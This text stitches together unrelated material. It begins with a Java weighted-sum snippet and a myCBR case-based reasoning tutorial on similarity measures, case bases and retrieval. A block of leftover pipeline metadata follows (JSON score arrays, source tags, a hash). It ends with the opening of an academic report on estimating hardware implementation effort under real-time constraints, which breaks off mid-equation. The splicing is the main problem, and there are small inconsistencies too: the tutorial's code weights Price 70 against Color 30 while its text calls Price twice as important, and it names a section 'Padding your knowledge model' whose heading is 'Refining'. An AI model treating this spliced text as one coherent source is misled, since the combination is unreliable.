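    public static double global(double[] localSims, double[] weights) {
        double num = 0.0, den = 0.0;
        for (int i = 0; i < localSims.length; i++) {
            num += weights[i] * localSims[i];  // weight each local similarity
            den += weights[i];                 // normalise by the total weight
        }
        return num / den;
    }

    public static void main(String[] args) {
        // e.g. Color (weight 30) and Price (weight 70), distributing 100 overall:
        double[] sims = {0.5, 0.9};
        double[] w = {30, 70};
        System.out.println(global(sims, w));   // (15 + 63) / 100 ≈ 0.78
    }
}
```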
The Concept Explanation Tab lets you provide explanations about the concept's nature and/or purpose as well as provide URLs pointing to explanatory artefacts.
Add a short descriptive text that explains the nature and/or purpose of the concept.
Add a URL to a resource that helps explaining the concept.
Add: Opens a dialog in which you can specify further URLs that point to resources that explain the concept.
Remove: Removes a selected URL entry from the list.
Edit similarity measures: Attribute Explanation
The Attribute Explanation Tab enables you to provide explanations about the selected attribute's nature and/or purpose as well as to provide URLs pointing to explanatory artefacts.
Add: Opens a dialog in which you can specify further URLs that point to resources that explain the attribute. Remove: Removes a selected URL entry from the list.
Add a short descriptive text that explains the nature and/or purpose of the attribute.
Add a URL to a resource that helps explaining the attribute.
Short description: In automobile engines, "cc" refers to the total volume of its engine displacement in cubic centimetres. For example if the vehicle engine size is stated as 2300 cc, that would equate to 2.3 l engine size (since 1000 cc = 1 l).
Edit similarity measures: Define Attribute: Symbol
Name: Enter the name of the attribute
Type: Symbol(ic)
This is automatically chosen, depending on the type you specified for the attribute.
The list of values (Symbols) the attribute has
Add: Lets you add symbols to the list of defined symbols for the attribute
Note: As long as you don’t cancel the dialog you will be asked to enter further symbols
Rename: Lets you rename a selected symbol from the list
Remove: Removes the selected symbol from the list
Edit similarity measure: Define Attribute: Integer
Editing float similarity measures works analogously
Name: Enter the name of the attribute
Type: Integer
Multiple: ?
Enter the allowed Minimum and Maximum values for this attribute.
Concept Information
Double clicking a concept brings up its information: its name and the SMF used on it.
The name of the concept. To rename it simply enter a new name here.
The available and used SMF for the concept.
Project Information
The SMF shown here specifies how special values (like unknown, unspecified) are handled within the project. Please see the next slide on this.
Double clicking a project brings up its information: its name and the SMF used on it.
The name of the project. To rename it simply enter a new name here. You can also provide information about the author of the project.
The SMF of the project defines the handling of the special values for attributes. These values are: _others_, _undefined_, _unknown_.
The SMF describes how similar these special values are to each other. You can define the way your CBR engine handles unknown data by changing this SMF.
Others: If the value/range for an Attribute is not provided by the CBR engine, the user can choose “other”
Unknown: If the value/range for an Attribute is not known by the user, he can choose “unknown”
Undefined: If a user doesn’t want to specify the value/range for an Attribute, he can choose “undefined”
Retrieval
The concept car is selected as the concept to start a retrieval for.
This list shows the result set of a retrieval. The overall similarity is shown and also used to sort the retrieved cases by their similarity to the case specified in the retrieval query.
Select a case base from the available case bases within your project via this dropdown menu.
Change: Allows you to select a new symbol from the list of symbols that are defined for the Attribute.
Special value: Allows you to select a special value (like “unknown”) for the attribute. This is useful to formulate sparse queries.
List view of the cases present in the selected case base.
This input form lets you specify concrete values for all attributes. By specifying attribute values you formulate your query to the system.
Start retrieval: Start the retrieval process on the selected case base with the specified query.
Initial Case Bases perspective view (Project selected)
The Case Bases perspective allows you to add/remove and modify the data within your cases and subsequently case base(s) after modelling your domain knowledge in the Modelling perspective.
You have to select a project to work on its case base(s).
Add and delete case bases.
The Case Base Tab is selected: This Tab lets you add and delete case bases.
The case base(s) used within the project are listed here, if a project is selected.
Case base browsing, Case viewing
Display of the selected case base's name
The case view displays the individual data (values of the Attributes) of a selected case
Clicking a case in the case list brings up the individual data of this case in the case view
Double clicking a case base brings up its Cases in the case list.
The Concept car is selected, which allows to add/remove and edit Instances (cases) of this concept.
Delete the selected Instance
Add a new Instance
The Instance tab is selected: This Tab lets you add and delete case(s) / Instances of the selected concept.
The case selected from the list of cases (Instances) in the currently selected case base for the selected concept (car) is shown in the Instance view.
Overview of the selected Instance of a concept (selected case)
Within this detailed view you can enter/change the data (attribute values) of a case.
Adding a new Instance: Entering the attribute values
For every attribute not of the data type symbol you can click into the field to directly enter a value for the attribute, for example an integer number.
A new tab is opened when a new instance is created, displaying the ID of the new instance.
For all attributes of the data type “symbol” by clicking “Change” a symbol can be assigned as the value of the attribute.
“undefined” is the default value for all attribute values. By clicking here you can change the value to a different special value: “unknown”.
The Concept car is selected, which allows to add/remove and edit Instances (cases) of this concept.
Filter integration is not yet enabled
Click here to create a new instance
Make sure to save your Project after adding new Instances to your case base(s)
Adding new Instances: Importing from CSV files
To import cases for a concept (Instances of the concept) right click the concept and select “Import cases from CSV file” in the context menu.
Adding new Instances: Importing from CSV files
In the upcoming dialogue you can specify the csv file to load and the separators that are used within the specified csv file. The dialogue will show you a preview of the data found in the csv file you specified using the separators you specified. To import this data click on “Finish”.
![Image of the CSV import dialogue]
```plaintext
Name | Value
0    | AMD Athlon 64 22 5200+
1    | AMD Athlon XP 2600
2    | AMD Athlon XP 3600+
3    | AMD Athlon XP 4600+
4    | AMD Athlon X2 3.45
5    | AMD Athlon X2 4600
```
Adding the new Instances to a case base
The imported instances can now be added to a (selected) case base by dragging and dropping them into the case base’s “Cases” field.
You always drag and drop your new instances into the case base, regardless of whether they were imported, generated, or entered manually.
Make sure to save your Project after adding new Instances to your case base(s).
Deleting an Instance from the case base
Select the Instance(s) to be deleted and then click on the Delete button. (For now, refresh the case base view manually (re-open it) to see the deletion.)
Adding a new case base to a project
Select the project you want to add a case base to
Click here to create a new case base for the currently selected project
Name the new case base and press “Ok”
Deleting a case base from a project
Select the project you want to delete a case base from
Click here to delete the selected case base
Select the case base you want to delete
myCBR Getting started: Modeling your domain
Start up myCBR
Starting up myCBR will bring up the UI as seen above. From this point on you can either start a new project or load an existing project.
Create a new project
Selecting “New Project” from the “File” context menu for now will start our new example project.
Create a new project
In the “New Project” dialog, specify the name of the new project and where to store it, then press “Save”
Our new project for this example will be named “NewExampleProject”
Create a new project
After creating and double-clicking the new project myCBR should present you with a view like this.
Add a concept to the project
1) Select the project to add a concept to
2) Click on “Add a concept”
3) In the dialog, enter the concept’s name
4) Confirm the creation of the concept by clicking OK
Add a concept to the project
1) Double-clicking your project expands the concept tree which now should be populated by the concept “Car”.
2) Double-clicking the concept “Car” should open the basic concept view as shown in this screenshot.
Add an attribute to the concept “Car”
1) Select the concept you want to add an attribute to. In our example we selected the concept “Car”.
2) Click on “Add new attribute”.
3) In the dialog, enter the attribute’s name.
4) Also in the dialog select the attribute’s data type by clicking on the drop down menu “Type” and selecting the data type you want for the attribute, in our example this is the data type “Symbol”.
5) Confirm the creation of the attribute by clicking on the “Finish” button.
Entering values for an attribute of the symbol data type
1) Select the attribute you want to enter values for.
2) Click on “Add” (a value)
3) Enter the value, in our example: Enter a string describing a colour.
4) Confirm the value by clicking “OK”. The dialog will reappear to allow you to enter further values. To stop entering values just click on “Cancel”.
Modeling a similarity measure for a symbol attribute
1) Finish entering all the values you want the attribute to have
2) Select the attribute (if not already working on the attribute and thus having it selected anyway).
3) Either double-click the default function to edit it or rather click on “Add new function” to add a new similarity measure (function).
Modeling a similarity measure for a symbol attribute
1) Enter a name for the new function
2) Select the kind of the new function
3) Confirm your entries by clicking on “Finish”
Modeling a similarity measure for a symbol attribute
1) You can choose between a symmetric or asymmetric matrix.
2) You can enter values between 0.0 and 1.0 by directly clicking into a field.
3) The values are also color-coding their cells to help you with visual feedback while modeling your similarity measure.
Modeling a similarity measure as a symbol taxonomy
- You can choose between a symmetric or asymmetric calculation.
- You can specify distinct ways to describe (calculate) the similarity for the query and for the case comparison.
- You can arrange the symbols in the taxonomy by drag & drop.
Assigning a similarity measure to an attribute
1) Double-click the concept that contains the attribute you want to assign a similarity measure for.
2) Double-click the default function of the concept’s (car, in our case) global similarity measure (or the currently selected similarity measure for the concept).
3) Select the desired similarity measure from the drop down menu “SMF”. In our example we are choosing “SimColorTaxonomy” as the similarity measure to be used to compute the local similarity of two symbols representing a colour within a query and our cases.
Adding a similarity measure for a float attribute
For float, as well as integer attributes, you are required to enter a minimum and maximum value, where the minimum must be lower than the maximum value.
After adding a new attribute of the data type float you can again specify its name.
Access the attributes characteristics by double-clicking it.
Modeling a similarity measure for a float attribute
You can select symmetric or asymmetric behaviour of the function. In our example we have chosen an asymmetric function.
You can decide if you want to have the plain distance or a quotient calculated as a similarity value.
In asymmetric mode this set (the left one) of options shapes the half of the function that calculates the similarity for query values greater than the values in a given case.
In asymmetric mode this set (the right one) of options shapes the half of the function that calculates the similarity for query values smaller than the values in a given case.
As we want to model the idea that a higher price is bad, we made the function rapidly decline the calculated similarity value after passing the query value (i.e., the case has a higher price than the query).
Assigning the similarity measure to the float attribute
1) Double-click the concept that contains the attribute you want to assign a similarity measure for.
2) Double-click the default function of the concept’s (car, in our case) global similarity measure (or the currently selected similarity measure for the concept).
3) Select the desired similarity measure from the drop down menu “SMF”. In our example we are choosing “SimPrice” as the similarity measure to be used to compute the local similarity of two float numbers representing a car’s price within a query and our cases.
Adding explanations to a concept
Select the concept you want to add canned explanations and/or an explanatory artefact for.
You can enter a free text that will be available via the API as the canned explanation for this concept.
Or you can click “Add” to add a reference (URL) to an explanatory artefact (for example a webpage with further information about the concept) for the concept.
Remember that you have to click on the “Concept Explanation” tab to get to the Concept Explanation edit view. To continue working with the concept, make sure you switch back to the “Concept” tab.
Modeling the global Similarity Measure
You can select the function’s type here. In the example we have chosen a weighted sum.
By setting “Discriminant” to “false” you exclude the local similarity value from being used in the calculation of the global similarity value.
Clicking in the “SMF” field allows you to choose one of the available similarity functions associated with the attribute.
Select the concept you want to define a global similarity measure for.
Double clicking in the “Weight” field allows you to enter a value for the weight of the local similarity measure associated with this field. The weighted sum of all local similarity measures will then form the global similarity between, in our example, one car and another. In our example “Price” is now twice as important for the global similarity between two cars as “Color” is.
Select the concepts default function to edit it.
Doing a Retrieval test [1]
After adding a case-base to your project... [See Slide 85]
Doing a Retrieval test [2]
And adding some instances of the concept “car” aka “cases” to the case base... See slides: 82, 83
You are ready to do a retrieval test.
The retrieval GUI is shown
And explained again on the following slide.
Retrieval GUI
Reminder
The concept car is selected as the concept to start a retrieval for.
This input form lets you specify concrete values for all attributes. By specifying attribute values you formulate your query to the system.
Start retrieval: Start the retrieval process on the selected case base with the specified query.
This list shows the result set of a retrieval. The overall similarity is shown and also used to sort the retrieved cases by their similarity to the case specified in the retrieval query.
Doing a Retrieval test [3]
Seen in our example here: We did a retrieval with the query ‘Color = red and Price = 5500’.
As you can see the cases in our case base are not very discriminable with respect to their similarity to the query.
This is an effect caused by the attribute ‘Price’ which we defined with a value range of 0 to 1,000,000.
As we only have cases (aka cars) with a price up to 30,000 the value range for the attribute “Price” is far too wide for our data (cases) at hand right now.
How can we change our model to reflect this knowledge, gathered by retrieval testing?
See how, in the following section: Padding your knowledge model.
myCBR Getting started: Refining your knowledge model
Doing a Retrieval test (again) [4]
As revealed by our first retrieval test at the end of the previous section, our knowledge model is not yet accurate enough. To amend the far too wide value range for “Price” we adapt its maximum to 50,000, and the cases become more distinguishable.
Changing the value range of the attribute “Price” to 0 to 50,000 and then redoing the retrieval with the same query as in our first retrieval test results in a far more distinguishable calculation of the case’s global similarities.
As you can see to the right, the similarities of the cases to the query are now more distinct and spread over the interval [0...1] than within the first retrieval test result depicted here again:
Thus, by adapting the value range of the attribute “Price”, based upon results from our first retrieval test, we enhanced the quality of our knowledge model and thus the retrieval results it provides.
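The effect is easy to verify by hand, assuming a simple linear difference-based measure sim = 1 − |query − case| / range (our SimPrice is shaped differently, but the tendency is the same):

```java
// Why narrowing the value range spreads the similarities: with a linear,
// difference-based measure, sim = 1 - |query - case| / range.
// Numbers reproduce the scenario above (query price 5500, cases up to 30000).
public class RangeEffect {
    static double sim(double query, double c, double range) {
        return 1.0 - Math.abs(query - c) / range;
    }

    public static void main(String[] args) {
        double query = 5500, expensiveCase = 30000;
        // Range 0..1,000,000: even the most expensive case looks almost identical.
        System.out.println(sim(query, expensiveCase, 1_000_000)); // ≈ 0.98
        // Range 0..50,000: the same case is now clearly less similar.
        System.out.println(sim(query, expensiveCase, 50_000));    // ≈ 0.51
    }
}
```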
After successful refinement: Save your model (project)
Select the project you want to save then in the “File” dialog select “Save” or “Save as”.
In the dialog select the place to save your project in, name it and click on “Save”.
Goals of knowledge model refinement
The goals of knowledge model refinement are:
Enhance the performance of your model’s retrieval
- Remove unnecessary attributes
- Reduce value ranges
- Streamline similarity measures
- Trim your case base (remove redundant, rarely used cases)
Enhance the accuracy of your model
- Refine similarity measures
- Add or diversify attributes to your concept
General tips for knowledge model refinement
**Enhance the performance of your model’s retrieval while not missing a thing:**
- Try to identify attributes that don’t have a great impact on your retrieval, then remove them
- Reduce your similarity measures to the necessary minimum, as their computation takes the most effort
- Monitor the frequency of your cases being retrieved; remove redundant or rarely used cases
- User-test your case base(s) to see if you have already integrated most of the cases a user can come up with in your domain context
**Enhance the accuracy of your model while keeping it lean:**
- Add or delete local similarities from your global similarity measure to keep it lightweight but still precise enough
- ‘Sharpen’ your similarity measures by restricting the value ranges to those encountered in the day-to-day use of your model
- User-test the modelling of your concepts with users unfamiliar with your model; this might yield valuable feedback to be integrated into your model
The cycle of knowledge model refinement
The cycle of knowledge model refinement offers the opportunity for iterative knowledge model optimisation, even at runtime of your application. As the CBR engine (your knowledge model and data) is modularised and thus separated from your application, you can optimise it and then ‘re-plug’ (reintegrate) the optimised version into your application, instantly benefiting from the improvements within your live application. This way you can choose whether to optimise your CBR engine until you reach certain quality measures, or to have it evolve constantly while being used.
- Perform a test series of retrievals on your model and subsequent data
- Initially model or ‘tweak’ your knowledge model in the workbench and / or create or optimise (add, reduce) your data (case bases(s))
- Evaluate your retrieval results with regard to performance and accuracy
Integrating the
56079, 112], [56079, 56132, 113], [56132, 57058, 114], [57058, 57290, 115], [57290, 57682, 116], [57682, 58691, 117], [58691, 59627, 118]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 59627, 0.04401]]}
|
olmocr_science_pdfs
|
2024-12-03
|
2024-12-03
|
68807818f42c882ad8e08c5589fc80398463885a
|
[REMOVED]
|
{"len_cl100k_base": 12848, "olmocr-version": "0.1.53", "pdf-total-pages": 11, "total-fallback-pages": 0, "total-input-tokens": 38692, "total-output-tokens": 14957, "length": "2e13", "weborganizer": {"__label__adult": 0.0004041194915771485, "__label__art_design": 0.00041294097900390625, "__label__crime_law": 0.0004570484161376953, "__label__education_jobs": 0.001934051513671875, "__label__entertainment": 0.0001361370086669922, "__label__fashion_beauty": 0.0002262592315673828, "__label__finance_business": 0.0009479522705078124, "__label__food_dining": 0.0005044937133789062, "__label__games": 0.0010576248168945312, "__label__hardware": 0.0011835098266601562, "__label__health": 0.0011749267578125, "__label__history": 0.0004949569702148438, "__label__home_hobbies": 0.0001684427261352539, "__label__industrial": 0.0006947517395019531, "__label__literature": 0.0006747245788574219, "__label__politics": 0.0003521442413330078, "__label__religion": 0.0005707740783691406, "__label__science_tech": 0.279052734375, "__label__social_life": 0.00013744831085205078, "__label__software": 0.02569580078125, "__label__software_dev": 0.6826171875, "__label__sports_fitness": 0.0002663135528564453, "__label__transportation": 0.000812530517578125, "__label__travel": 0.0002658367156982422}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 49067, 0.01826]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 49067, 0.65356]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 49067, 0.85843]], "google_gemma-3-12b-it_contains_pii": [[0, 5172, false], [5172, 11271, null], [11271, 17412, null], [17412, 18899, null], [18899, 24105, null], [24105, 29630, null], [29630, 32457, null], [32457, 34733, null], [34733, 38782, null], [38782, 44307, null], [44307, 49067, null]], "google_gemma-3-12b-it_is_public_document": [[0, 5172, true], [5172, 11271, null], [11271, 17412, null], 
[17412, 18899, null], [18899, 24105, null], [24105, 29630, null], [29630, 32457, null], [32457, 34733, null], [34733, 38782, null], [38782, 44307, null], [44307, 49067, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 49067, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 49067, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 49067, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 49067, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 49067, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 49067, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 49067, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 49067, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 49067, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 49067, null]], "pdf_page_numbers": [[0, 5172, 1], [5172, 11271, 2], [11271, 17412, 3], [17412, 18899, 4], [18899, 24105, 5], [24105, 29630, 6], [29630, 32457, 7], [32457, 34733, 8], [34733, 38782, 9], [38782, 44307, 10], [44307, 49067, 11]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 49067, 0.0]]}
|
olmocr_science_pdfs
|
2024-12-12
|
2024-12-12
|
feb434b370595c145bdc382665a9b6d9308ad61a
|
Technical Report
Real-Time Aware Hardware Implementation Effort Estimation
Abildgren, Rasmus; Diguet, Jean-Philippe ; Gogniat, Guy; Koch, Peter; Le Moullec, Yannick
Publication date:
2010
Document Version
Early version, also known as pre-print
Link to publication from Aalborg University
Abstract—This paper presents a structured method and underlying models for estimating the hardware implementation effort of hard real-time constrained embedded systems. We propose an optimization model which takes some of the most common optimization techniques into account, as well as the order in which they should be applied. We suggest a set of two metrics used to characterise the effects of optimisations: one expressing how hard it is to reach an implementation satisfying the real-time constraints, and another one reflecting how the distribution of parallelism in an algorithm influences the impact of the optimisations. The experimental results are not unambiguous; however, for most algorithms our approach enables the estimation of the hardware implementation effort of hard real-time constrained applications.
Index Terms—real-time; hardware; implementation; effort; FPGA
I. INTRODUCTION
The need for continuous innovation combined with growing complexity, increased product release frequency, increasing time-to-market pressure and fierce competition, make the task of project managers working in the embedded systems industry more and more challenging. For example, the 2009 Embedded Market Study [1] reports that 63% of the projects were not finished on schedule and that the average lateness is 4.4 months.
In this context, accurate development time estimates are an essential tool which can make the difference between success and failure. However, obtaining such estimates is not a trivial task, since development time depends on many factors, including technical (hardware and software, e.g. products built upon new platforms, area/time/energy constraints), human (e.g. skills, mood of the developers), and managerial aspects.
Whereas methods and techniques are readily available for estimating the development time of software executing on GPPs [2], mainly for desktop applications, to the best of our knowledge little effort has been directed at the hardware domain. Working with a systematic approach for estimating the development time of different projects requires a certain maturity in the organisation. Many small and medium-sized enterprises (SMEs) usually do not have such priorities, although they would benefit from them. Many SMEs perform "ad hoc" estimations (e.g. based on experience or intuition), but in many cases these ad hoc approaches do not provide accurate estimates, which in turn means delayed projects. This work proposes a method and tools which offer a systematic and structured approach for estimating the implementation effort more precisely.
A. Our Prior Work
The work presented in this paper is part of a larger effort aiming at improving this situation [3]. In this paper we describe our contribution regarding the problem of estimating the hardware implementation effort (in terms of development time) for real-time constrained applications. This contribution is an extension of what is summarized below.
In [3] it has been shown that every path in the algorithm(s) that the designer must implement adds to the development time and that the complexity of a design can be expressed by the number of independent paths in the algorithm(s). It has also been shown that, when the experience of the designer is taken into account, a relation between the number of independent paths and the development time exists, and that it is possible to estimate the hardware implementation effort (in terms of development time) of applications.
However, in many cases the implementation can become very challenging when (hard) real-time constraints need to be fulfilled. Typically in such cases only a limited number of “implementational tracks” lead to a (or sometimes the) satisfying solution. This can be illustrated as in Fig. 1, where only one implementation track (the thick red line) satisfies the constraints. The idea on which this work builds is that real-time constraints make the implementation more difficult and that, in order to fulfill these constraints, designers need to perform certain optimizations in a certain order. Identifying a (or the) suitable track adds to the overall development time, since extra effort must be spent evaluating and applying the right combination (i.e. type and order) of optimization techniques. In order to take these considerations into account, we propose to complement and augment our prior work with several extensions. These extensions are described in Section I-B.
B. Contributions
One major contributor to the overall development time is the implementation effort. The contributions presented in this paper are i) a method and ii) a set of underlying models aiming at estimating the implementation effort, measured in time, of real-time constrained embedded applications. We propose an optimization model which takes some of the most common optimization techniques into account, as well as the order in which they should be applied. An essential contribution of this work is a set of two metrics used to characterise the effects of optimisations. The first one expresses how hard it is to reach an implementation satisfying the real-time constraints. The second one reflects how the distribution of parallelism in an algorithm influences the impact of the optimisations.
The remainder of the paper is organized as follows: Section II introduces related work. Section III details the proposed methodology and Section IV details the metric for the distribution of the parallelism. Subsequently, Section V presents and discusses the experimental results obtained. Finally, Section VI concludes the paper.
II. STATE OF THE ART - EFFORT ESTIMATION
To the best of our knowledge, very few works address the problem of estimating the hardware implementation effort of hard real-time constrained applications. On the other hand, there exist several approaches for estimating the software implementation effort, some of them providing ideas and directions for the hardware oriented ones. Thus, in this section we start by reviewing the most relevant approaches for estimating the software implementation effort and proceed with the few existing approaches for hardware implementation effort estimation.
Some of the best-known and most widely used approaches for estimating the software implementation effort are the COCOMO project [2], function point [4], and SPQR/20 [5]. They all build upon the same concept: firstly, in order to quantify certain properties of an algorithm, a measure or set of measures is defined. Secondly, a model describing the relation between the measure(s) and the implementation effort is derived.
The core idea in COCOMO (COnstructive COst MOdel) [2] is that the effort mainly depends on the project size, i.e., Effort = A · size^b, where A and b are adjustable parameters which must be trained.
Function point [4] consists of two main stages. The first stage counts and classifies the function types of the software: identified functions are weighted to reflect their complexity, which in practice is left to the developers' perception. The second stage is the adjustment of the function points based on 14 parameters which are tuned according to the characteristics of the application and of its environment. Subsequently, the function points are converted into a LOC measure based on an implementation-language-dependent factor, which in turn can be used as an implementation effort estimation metric.
SPQR/20 (Software Productivity, Quality and Reliability with regard to 20 influencing factors) [5] has been proposed as a less heuristic-oriented variant of function point; experimental results [6] suggest that it can provide the same accuracy as function point while being simpler to work with.
Publications dealing with the estimation of hardware implementation effort are far less abundant than those dealing with software. Considering the context of the present work, interesting approaches include VHDL function point [7] and cost models such as [8]. Several other publications such as [9] compare actual hardware implementation efforts for different design methodologies but do not provide any systematic method to estimate those efforts.
VHDL function point, presented in [7], builds upon the idea of function point analysis, modified to work with VHDL code. The approach consists in counting the number of internal I/O signals and components, and classifying these counts into levels. From there, a function point value related to VHDL is extracted. Experimental results considering the number of source lines in the LEON-1 processor project yield predictions which are within 20% of the real size. However, estimating the size does not always give an accurate indication of the implementation difficulty, especially when the application is subject to real-time constraints.
[8] introduces a cost model with the objective of understanding current Product Development Cycles (PDC) and evaluating the impact of new technologies on these PDC. In particular, the authors focus on cost and product development time and propose a PDC known as One Pass to Production (OPP), which takes both the software and hardware aspects of a complete system into consideration. Although promising, their approach is very specific (they consider an FPGA-based NOC backbone) and the numerous assumptions made by the authors (e.g. regarding the number of required engineers) make it challenging to see how their approach could be made sufficiently generic to be applied to much more varied types of applications.
We can safely conclude that there is currently a lack of suitable and systematic methods and tools for estimating the hardware implementation effort for real-time constrained applications. In what follows we present our contribution to improve this situation.
III. METHODOLOGY
In [3] it has been shown that the hardware implementation effort can be modelled as
\[ Effort = A(\eta(Dev) \cdot P(alg))^b \]
(1)
where \( \eta \) reflects the experience of the developer \( Dev \), \( P(alg) \) is the number of independent paths in the algorithm \( alg \), and \( A \) and \( b \) are trim parameters.
Experimental results have shown that it is possible to estimate the hardware implementation effort, expressed as the development time, of applications, and that the proposed model is able to estimate the needed implementation effort with a confidence interval of 95%. However, this approach does not specifically target real-time constrained applications and is therefore not suitable for this type of application.
Since in this work we want to take hard real-time constraints into account, we propose a method which adds a parameter \( \tau(t_c) \) expressing the difficulty, or hardness, of reaching an implementation which meets the time constraint \( t_c \). We call this parameter the implementation hardness, and the effort can therefore be modeled as:
\[ Effort = A(\eta(Dev) \cdot P(alg) \cdot \tau(t_c))^b \]
(2)
The underlying idea is that the farther the execution time \( t_{exec} \) is from \( t_c \), the more difficult it will be to fulfill \( t_c \). Whenever \( t_c \) is not met, optimizations have to be performed. However, modeling optimizations and their impact is not a trivial task for a designer; therefore, in what follows, we propose a method and a set of models which reflect the most common cases.
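To make the role of the hardness parameter concrete, the effort model of Eq. 2 can be sketched as below. The concrete values of $A$, $b$, $\eta(Dev)$ and $\tau(t_c)$ are purely illustrative placeholders here, since the paper leaves $A$ and $b$ to be trained on project data.

```python
# Sketch of the effort model of Eq. 2 (illustrative only): A and b
# must be trained on historical project data, eta reflects the
# developer's experience, and tau is the implementation hardness.

def effort(eta_dev, p_alg, tau_tc, A=1.0, b=1.2):
    """Estimated implementation effort, Eq. 2:
    Effort = A * (eta(Dev) * P(alg) * tau(t_c))^b."""
    return A * (eta_dev * p_alg * tau_tc) ** b

# With tau = 1 (no real-time hardness) Eq. 2 reduces to Eq. 1,
# so tightening the constraint can only increase the estimate.
baseline = effort(eta_dev=1.0, p_alg=10, tau_tc=1.0)
constrained = effort(eta_dev=1.0, p_alg=10, tau_tc=2.0)
assert constrained > baseline
```

Note that since $\tau(t_c) \geq 1$ multiplies the path count inside the exponentiated term, the hardness parameter scales the baseline estimate of Eq. 1 rather than adding a constant offset.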
A. Real-Time Constraint
When optimizing an implementation to meet a real-time constraint, the possible optimization strategies are manifold. For a developer, the optimization strategy is very much application dependent, but it also depends on his experience and analytical thinking. Optimizations fall into two different domains: spatial and temporal. Optimizations in the spatial domain include exploiting algorithmic parallelism on multiple functional units. For the temporal domain, different optimization techniques exist, such as chaining and pipelining.
Typically, the type of optimization to be performed in the temporal domain is chosen depending on a) data/control dependencies in the algorithm and b) the constraint type:
- Throughput (pipelining)
- Latency (chaining)
Both types of constraints can benefit from parallelism exploration. Usually, when analyzing an algorithm for e.g. parallelism, the measure applied will indicate the potential of exploiting the entire parallelism in the algorithm, as for example with the measure \( \gamma \) [10]. Performing a straight manual implementation of an algorithm will usually not result in a complete exploitation of the parallelism, either because it is not necessary or because the designer has omitted optimizations which could have a significant impact on the exploitation of the algorithm’s inherent parallelism.
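As a rough illustration of such a parallelism measure, \( \gamma \) can be read as the ratio between the total number of operations \( NOP \) and the length of the critical path \( CP \), which is the interpretation consistent with the examples of Section IV (15 nodes, critical path of 5, \( \gamma = 3 \)). The small dependency graph below is illustrative only.

```python
# Sketch: the speedup bound gamma = NOP / CP for a small operation
# DAG (the interpretation of the gamma measure of [10] used in the
# examples of Section IV; graph and values are illustrative).

def critical_path(deps):
    """Length (in operations) of the longest dependency chain.
    deps maps each operation to the operations it depends on."""
    memo = {}
    def depth(op):
        if op not in memo:
            memo[op] = 1 + max((depth(d) for d in deps[op]), default=0)
        return memo[op]
    return max(depth(op) for op in deps)

# Three independent chains of five operations each (cf. Fig 5):
deps = {}
for chain in range(3):
    prev = None
    for step in range(5):
        op = (chain, step)
        deps[op] = [prev] if prev is not None else []
        prev = op

nop = len(deps)            # 15 operations in total
cp = critical_path(deps)   # critical path of length 5
gamma = nop / cp
assert (nop, cp, gamma) == (15, 5, 3.0)
```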
An illustration of the overall optimisation approach is shown in Fig. 2. The starting point will usually be a sequential version of the algorithm. The developer chooses in which order he/she performs the different optimisations strategies. For our approach we constrain the optimisation strategy to follow the thick line.
In order to guide the designer in the exploration of the parallelism, this work considers a fully spatially parallelized algorithm as one extreme. Similarly, a completely chained implementation is considered as the other extreme. These extremes indicate the bounds of how much speedup can be obtained when applying the respective type of optimization, without rewriting the algorithm.
Furthermore, not knowing the exact strategy that a development engineer is following, but knowing which options he/she has, our hypothesis is that it is possible to estimate the minimum number of optimizations required in order to fulfill a real-time constraint. This, in turn, provides useful information which can be converted into the implementation hardness parameter, $\tau$, of Eq. 2 for estimating the required implementation effort.
It is therefore important to know how many optimizations in the different categories should be applied in order to fulfill the time constraint, $t_c$. The next section describes the concept of estimating the execution time on the basis of the number of optimizations.
B. Optimisation Dependent Execution Time Estimation

Every optimisation yields a certain speed-up of the execution time. Fig. 3 shows the execution time of an algorithm for different numbers of optimisations in the different optimisation categories. This is illustrated by the relation between the number of applied optimisations (represented by the small vertical lines) and the resulting execution time ($t_{exec}$) for several optimisation strategies (parallelization and parallelization+chaining).
The reduction (per optimisation) of the execution time gets smaller as the number of optimisations increases for a given strategy. This is represented by the spacing between the small vertical lines. In order to arrive at an execution time equal to or smaller than the time constraint ($t_c$), represented by the dashed line, the designer can choose between several possible paths. An optimization path is the number of optimizations performed in the parallelization category followed by the number of optimizations performed in the chaining category. The number of optimisations in the different categories can vary, since there can be more than one path satisfying the time constraint.
Therefore, it is necessary to know an estimate of the execution time for different optimization paths. In the following we describe how to estimate the execution time for the non-optimized case and the three different optimisation cases:
1) Case 0: No optimization (sequential execution): The simplest case is sequential execution. To calculate the estimate, $t_{exec}$, we use the following equation:

$$t_{exec}(0) = \frac{NOP}{f_{arch}} \quad (3)$$

where $NOP$ denotes the number of operations in the sequential algorithm and $\frac{1}{f_{arch}}$ the time for executing one operation. In this work we assume that all operations can be considered atomic and therefore have the same execution time.
2) Case 1: Parallel optimization: The estimated execution time, $t_{exec}(NOO_{PAR})$, when applying a certain number of parallelization optimisations, $NOO_{PAR}$, can be expressed as:

$$t_{exec}(NOO_{PAR}) = \frac{NOP}{\gamma_{impl}(NOO_{PAR}) f_{arch}} \quad (4)$$

where $\gamma_{impl}(NOO_{PAR})$ expresses the degree of speed-up obtained with $NOO_{PAR}$ optimisations. This can be calculated as:

$$\gamma_{impl}(NOO_{PAR}) = \frac{NOP}{NOP - NOP_{opt}(NOO_{PAR})} \quad (5)$$

